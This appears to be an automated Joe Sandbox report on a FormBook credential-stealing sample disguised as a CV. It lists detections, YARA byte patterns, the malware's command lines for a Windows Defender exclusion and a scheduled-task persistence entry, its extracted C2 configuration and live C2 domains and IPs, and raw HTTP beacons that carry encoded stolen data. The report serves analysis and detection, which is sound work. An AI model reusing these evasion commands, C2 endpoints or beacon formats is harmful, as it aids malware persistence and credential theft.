Edit tour

Windows Analysis Report
CV.bat.exe

Overview

General Information

Sample Name:	CV.bat.exe
Analysis ID:	715070
MD5:	40372d67f0de4526f04fba7948f7ff02
SHA1:	f1c8f97bd587125f6c48fb5e80bd191bff253a97
SHA256:	8bdbc254d871d5f2ffbdc50ea20070910cfa9c1be2b114ae1077ebc7b6d245d2
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

System process connects to network (likely due to code injection or exploit)

Sigma detected: Scheduled temp file as task from temp location

Multi AV Scanner detection for dropped file

Sample uses process hollowing technique

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Deletes itself after installation

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Adds a directory exclusion to Windows Defender

Uses schtasks.exe or at.exe to add and modify task schedules

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

CV.bat.exe (PID: 6056 cmdline: C:\Users\user\Desktop\CV.bat.exe MD5: 40372D67F0DE4526F04FBA7948F7FF02)

powershell.exe (PID: 5156 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 5152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 5148 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PzKpucfDtCCmww" /XML "C:\Users\user\AppData\Local\Temp\tmpE00F.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

CV.bat.exe (PID: 5060 cmdline: C:\Users\user\Desktop\CV.bat.exe MD5: 40372D67F0DE4526F04FBA7948F7FF02)

explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

chkdsk.exe (PID: 1264 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.miarizzuto.org/redb/"], "decoy": ["p38MheawG5TlW4TfEW6HgnBkENlaHA==", "F+wu9lADd7UfKolzCb9JriAY5iBtDQ==", "PMgcpd10tc8LZXzLxv4=", "4aYRlQCb7ZZngur8q5Rm3kIG7S0=", "gae+T40jXAwQNntTjeU=", "nDNoH34RcgfW/T4Ywoj4GxdCtw==", "FubuYrVZyeowZKOpSkjwGxdCtw==", "NsZyQ5lBhfS7M1Yx4Q==", "ShBaHnokZaIGGCu+v/w=", "lWJW3gysIs6U7DGWty1OHzCrue9z", "qsjESV5CtJxV0SgCbsJewg==", "P+EX8vkyJWffLEtt97JEwA==", "z/cJhdNs94kvQZJi2VN6Q+7grOZx", "AdeUdb1hY9RKdOmFObn0", "4IR+FFv7MeHN6Cf+bsJewg==", "1qYHwBCj8omX9xww4w==", "EqleInYijmBzntqzWkNfsmA=", "wdDzwzcDOKBinhcAbsJewg==", "krhiJnYVgPe19Ug47cFafWXBYNNeHA==", "XvZT4SS4I5z7I4KPKwE1rUXn", "3+jWW9Cjn6CDtRam33vCu29XvQ==", "fixwUsqR/Bhvoxelu8p62kIG7S0=", "+xZKR0ZmPHiNmA==", "s+wCc7RamYK1zRtqV4tu20IG7S0=", "Adpp4DwAZvKTqQTutY78GxdCtw==", "ENoh3DrcN71TZZ7yuDwz7hb4", "hVdX90DrOpYeTLlSjDqBHsUhvw==", "JLDfpyXXPZoFE3hUyUMtOjPw", "vcxK310Uizkei4li+g==", "jVoz8Wo8fftcy0Y19A==", "/9NY2EQWgeFpnOE4PpKhiEIG7S0=", "VWWBP5ApimC5WSu+v/w=", "/4jic9h447GVpPjaiJJDt1OWV9Tjrj8=", "Q3IXW01pPHiNmA==", "zu5p800BTjnc+HBX", "sHpILIYjPHiNmA==", "kzZ3NXccc1VJU6b8CQlYPzCgLCU=", "JkDjrfap8OwGNo5l7b9NWnBWAjF/FA==", "eZ7YtfuZDNykFpLz6w==", "+xCzdKQ4l9xjnPSCps41rUXn", "AMBRFYdNtwxsbtm0MnMRgmA=", "0PqdgNaF09X4IpumBiOU2w==", "LDOgG3QmrIdnh8xlQdT+", "WHr+gr5vzOwXZXzLxv4=", "1HCmeNBTwkgPOjMZues=", "Ey2VG0fZDBIARaZZ", "omKAbliAi+N88WFM", "o8Istv946qZPd/DSVxaBI4qcKDo=", "yJ7urxrQGzh79xww4w==", "gSagOLSM94AnZcIgNHEE7BT4", "Qw4NhuR+4wY8YNlKd/QdAD0o6KjhuZtdtA==", "fpkQmAa5Mc1bbcRlQdT+", "WCBsPKxZzVzxCUvUCwdC1Hc=", "jjsM3i7VLQYqPqEIITscq1fmBgp5Aw==", "RdisRWOCpYiFmQ==", "Hry/mxIQHqRu", "7fuXY96T/ZEkivUHv5X2", "xtp9W9eNjxd/5Oc6RFa1YB5DtQ==", "pMfOU5EWV01pdcMiPlQNWrZT/zQ=", "jUmgKGL5a/tcy0Y19A==", "pkrCW5s1rBqi3FXkFa4A3QGrue9z", "uYslkvGb8iFcy0Y19A==", "S9y7PZ5kwHP1PZLg2vCU3Q==", "DalTG28tlbdvpPQ="]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f230:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa97f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17eb7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17cb5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17761:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17db7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17f2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa54a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x169ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1de87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ef9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a179:$sqlite3step: 68 34 1C 7B E1 0x1acf1:$sqlite3step: 68 34 1C 7B E1 0x1a1bb:$sqlite3text: 68 38 2A 90 C5 0x1ad36:$sqlite3text: 68 38 2A 90 C5 0x1a1d2:$sqlite3blob: 68 53 D8 7F 8C 0x1ad4c:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.418181649.0000000000DE0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0xa97f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x10230:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x8eb7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8cb5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x8761:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x8db7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x8f2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x79ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xee87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xff9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xb179:$sqlite3step: 68 34 1C 7B E1 0xbcf1:$sqlite3step: 68 34 1C 7B E1 0xb1bb:$sqlite3text: 68 38 2A 90 C5 0xbd36:$sqlite3text: 68 38 2A 90 C5 0xb1d2:$sqlite3blob: 68 53 D8 7F 8C 0xbd4c:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f230:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa97f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17eb7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17cb5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17761:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17db7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17f2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa54a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x169ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1de87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ef9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a179:$sqlite3step: 68 34 1C 7B E1 0x1acf1:$sqlite3step: 68 34 1C 7B E1 0x1a1bb:$sqlite3text: 68 38 2A 90 C5 0x1ad36:$sqlite3text: 68 38 2A 90 C5 0x1a1d2:$sqlite3blob: 68 53 D8 7F 8C 0x1ad4c:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6d38:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f967:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xb0b6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x185ee:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x183ec:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17e98:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x184ee:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x18666:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xac81:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x170e3:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1e5be:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1f6d1:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a8b0:$sqlite3step: 68 34 1C 7B E1 0x1b428:$sqlite3step: 68 34 1C 7B E1 0x1a8f2:$sqlite3text: 68 38 2A 90 C5 0x1b46d:$sqlite3text: 68 38 2A 90 C5 0x1a909:$sqlite3blob: 68 53 D8 7F 8C 0x1b483:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1f230:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa97f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x17eb7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x17cb5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17761:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17db7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x17f2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa54a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x169ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1de87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ef9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1a179:$sqlite3step: 68 34 1C 7B E1 0x1acf1:$sqlite3step: 68 34 1C 7B E1 0x1a1bb:$sqlite3text: 68 38 2A 90 C5 0x1ad36:$sqlite3text: 68 38 2A 90 C5 0x1a1d2:$sqlite3blob: 68 53 D8 7F 8C 0x1ad4c:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: CV.bat.exe PID: 6056	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: CV.bat.exe PID: 5060	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xf38e6:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: chkdsk.exe PID: 1264	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x42890:$a1: 3C 30 50 4F 53 54 74 09 40 0x1053ae:$a1: 3C 30 50 4F 53 54 74 09 40 0x1b58a7:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 20 entries

Sigma Signatures

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PzKpucfDtCCmww" /XML "C:\Users\user\AppData\Local\Temp\tmpE00F.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PzKpucfDtCCmww" /XML "C:\Users\user\AppData\Local\Temp\tmpE00F.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\CV.bat.exe, ParentImage: C:\Users\user\Desktop\CV.bat.exe, ParentProcessId: 6056, ParentProcessName: CV.bat.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PzKpucfDtCCmww" /XML "C:\Users\user\AppData\Local\Temp\tmpE00F.tmp, ProcessId: 5148, ProcessName: schtasks.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: CV.bat.exe	ReversingLabs: Detection: 33%
Source: CV.bat.exe	Virustotal: Detection: 34%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe

ReversingLabs: Detection: 33%

Machine Learning detection for sample

Source: CV.bat.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe

Joe Sandbox ML: detected

Source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.miarizzuto.org/redb/"], "decoy": ["p38MheawG5TlW4TfEW6HgnBkENlaHA==", "F+wu9lADd7UfKolzCb9JriAY5iBtDQ==", "PMgcpd10tc8LZXzLxv4=", "4aYRlQCb7ZZngur8q5Rm3kIG7S0=", "gae+T40jXAwQNntTjeU=", "nDNoH34RcgfW/T4Ywoj4GxdCtw==", "FubuYrVZyeowZKOpSkjwGxdCtw==", "NsZyQ5lBhfS7M1Yx4Q==", "ShBaHnokZaIGGCu+v/w=", "lWJW3gysIs6U7DGWty1OHzCrue9z", "qsjESV5CtJxV0SgCbsJewg==", "P+EX8vkyJWffLEtt97JEwA==", "z/cJhdNs94kvQZJi2VN6Q+7grOZx", "AdeUdb1hY9RKdOmFObn0", "4IR+FFv7MeHN6Cf+bsJewg==", "1qYHwBCj8omX9xww4w==", "EqleInYijmBzntqzWkNfsmA=", "wdDzwzcDOKBinhcAbsJewg==", "krhiJnYVgPe19Ug47cFafWXBYNNeHA==", "XvZT4SS4I5z7I4KPKwE1rUXn", "3+jWW9Cjn6CDtRam33vCu29XvQ==", "fixwUsqR/Bhvoxelu8p62kIG7S0=", "+xZKR0ZmPHiNmA==", "s+wCc7RamYK1zRtqV4tu20IG7S0=", "Adpp4DwAZvKTqQTutY78GxdCtw==", "ENoh3DrcN71TZZ7yuDwz7hb4", "hVdX90DrOpYeTLlSjDqBHsUhvw==", "JLDfpyXXPZoFE3hUyUMtOjPw", "vcxK310Uizkei4li+g==", "jVoz8Wo8fftcy0Y19A==", "/9NY2EQWgeFpnOE4PpKhiEIG7S0=", "VWWBP5ApimC5WSu+v/w=", "/4jic9h447GVpPjaiJJDt1OWV9Tjrj8=", "Q3IXW01pPHiNmA==", "zu5p800BTjnc+HBX", "sHpILIYjPHiNmA==", "kzZ3NXccc1VJU6b8CQlYPzCgLCU=", "JkDjrfap8OwGNo5l7b9NWnBWAjF/FA==", "eZ7YtfuZDNykFpLz6w==", "+xCzdKQ4l9xjnPSCps41rUXn", "AMBRFYdNtwxsbtm0MnMRgmA=", "0PqdgNaF09X4IpumBiOU2w==", "LDOgG3QmrIdnh8xlQdT+", "WHr+gr5vzOwXZXzLxv4=", "1HCmeNBTwkgPOjMZues=", "Ey2VG0fZDBIARaZZ", "omKAbliAi+N88WFM", "o8Istv946qZPd/DSVxaBI4qcKDo=", "yJ7urxrQGzh79xww4w==", "gSagOLSM94AnZcIgNHEE7BT4", "Qw4NhuR+4wY8YNlKd/QdAD0o6KjhuZtdtA==", "fpkQmAa5Mc1bbcRlQdT+", "WCBsPKxZzVzxCUvUCwdC1Hc=", "jjsM3i7VLQYqPqEIITscq1fmBgp5Aw==", "RdisRWOCpYiFmQ==", "Hry/mxIQHqRu", "7fuXY96T/ZEkivUHv5X2", "xtp9W9eNjxd/5Oc6RFa1YB5DtQ==", "pMfOU5EWV01pdcMiPlQNWrZT/zQ=", "jUmgKGL5a/tcy0Y19A==", "pkrCW5s1rBqi3FXkFa4A3QGrue9z", "uYslkvGb8iFcy0Y19A==", "S9y7PZ5kwHP1PZLg2vCU3Q==", "DalTG28tlbdvpPQ="]}

Source: CV.bat.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: CV.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: wntdll.pdbUGP source: CV.bat.exe, 00000008.00000003.301579831.0000000001080000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000008.00000003.297213118.0000000000EF0000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000003.417519841.00000000054B4000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000002.531741340.0000000005800000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000003.421300076.000000000566D000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000002.533143376.000000000591F000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: CV.bat.exe, CV.bat.exe, 00000008.00000003.301579831.0000000001080000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000008.00000003.297213118.0000000000EF0000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000003.417519841.00000000054B4000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000002.531741340.0000000005800000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000003.421300076.000000000566D000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000002.533143376.000000000591F000.00000040.00000800.00020000.00000000.sdmp

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.hipnoterapia.store
Source: C:\Windows\explorer.exe	Network Connect: 91.195.240.94 80
Source: C:\Windows\explorer.exe	Network Connect: 63.141.242.46 80
Source: C:\Windows\explorer.exe	Domain query: www.yaignars.site
Source: C:\Windows\explorer.exe	Domain query: www.miarizzuto.org

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.miarizzuto.org/redb/

Source: Joe Sandbox View

ASN Name: SEDO-ASDE SEDO-ASDE

Source: global traffic	HTTP traffic detected: GET /redb/?SrNH_=ZbLl4nlXWVx&WvMH=ClEE/ZchhSWI9Fw4wt/3uVHiPVKnhBdsoB1lL7XTwBZGLskW0dT3J+GyfBiSRlOqjq3/13+wQlUMF9TRa7Zw+CqEhvu+ka1r7A== HTTP/1.1Host: www.miarizzuto.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /redb/?SrNH_=ZbLl4nlXWVx&WvMH=sSqPgCldjkbi0+fTeRrTo1yeRkXijBFS3eCOWeLwWqlRfT02SfRof0res+4jmsjJUPdu+dXwzSVFQdySZWLfkZF8oXotr+qwUQ== HTTP/1.1Host: www.yaignars.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 91.195.240.94 91.195.240.94

Source: global traffic	HTTP traffic detected: POST /redb/ HTTP/1.1Host: www.yaignars.siteConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.yaignars.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.yaignars.site/redb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 57 76 4d 48 3d 68 51 43 76 6a 79 52 34 69 48 37 57 37 50 4c 37 55 67 7a 45 72 67 32 41 54 57 33 4c 6c 6e 67 71 68 73 62 6d 56 63 54 41 64 63 31 4d 56 77 31 56 41 50 64 5f 65 6c 61 43 6f 50 41 6a 74 4f 66 56 53 2d 42 32 70 39 54 6f 74 41 41 67 55 65 6d 66 43 48 7a 61 75 2d 6f 57 6e 42 73 54 69 39 33 62 52 47 30 47 69 32 45 74 65 6a 63 51 69 55 6e 33 7e 52 64 4c 72 39 67 53 30 44 74 7a 57 7a 32 69 4e 4b 7a 65 49 35 54 77 71 67 76 4c 28 66 7e 6f 54 70 55 31 6d 50 6a 7a 34 6f 56 33 77 34 62 4f 33 36 37 47 66 78 74 2d 55 63 68 42 69 73 62 36 59 65 68 6c 72 72 47 30 56 73 61 57 33 41 6a 34 6e 59 52 73 34 51 76 5a 6d 54 52 31 43 4e 6f 4f 6c 35 6f 31 28 6c 50 61 35 32 41 31 57 65 75 5f 6b 59 5a 69 71 6f 39 66 55 6b 4d 30 4a 4f 41 77 79 4d 42 41 72 34 61 2d 65 76 62 45 51 6c 45 48 50 33 42 77 70 43 71 2d 31 44 50 53 32 73 6f 55 46 43 55 51 57 66 68 58 54 65 79 4e 45 56 53 51 38 76 28 48 68 30 45 52 71 41 30 33 64 55 75 4a 63 78 4f 77 42 4a 38 61 49 68 65 36 28 37 38 6c 65 66 37 62 4a 74 48 75 72 66 67 65 79 78 78 72 4b 4c 33 2d 41 76 6a 63 4f 78 51 34 67 73 70 6c 58 69 5a 6f 58 4f 45 53 6b 53 5a 71 57 65 44 76 41 61 38 51 6e 61 44 6b 49 77 42 48 55 7a 79 68 76 7a 42 49 37 65 56 6f 33 4b 69 48 64 6b 41 4e 52 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: WvMH=hQCvjyR4iH7W7PL7UgzErg2ATW3LlngqhsbmVcTAdc1MVw1VAPd_elaCoPAjtOfVS-B2p9TotAAgUemfCHzau-oWnBsTi93bRG0Gi2EtejcQiUn3~RdLr9gS0DtzWz2iNKzeI5TwqgvL(f~oTpU1mPjz4oV3w4bO367Gfxt-UchBisb6YehlrrG0VsaW3Aj4nYRs4QvZmTR1CNoOl5o1(lPa52A1Weu_kYZiqo9fUkM0JOAwyMBAr4a-evbEQlEHP3BwpCq-1DPS2soUFCUQWfhXTeyNEVSQ8v(Hh0ERqA03dUuJcxOwBJ8aIhe6(78lef7bJtHurfgeyxxrKL3-AvjcOxQ4gsplXiZoXOESkSZqWeDvAa8QnaDkIwBHUzyhvzBI7eVo3KiHdkANRg).
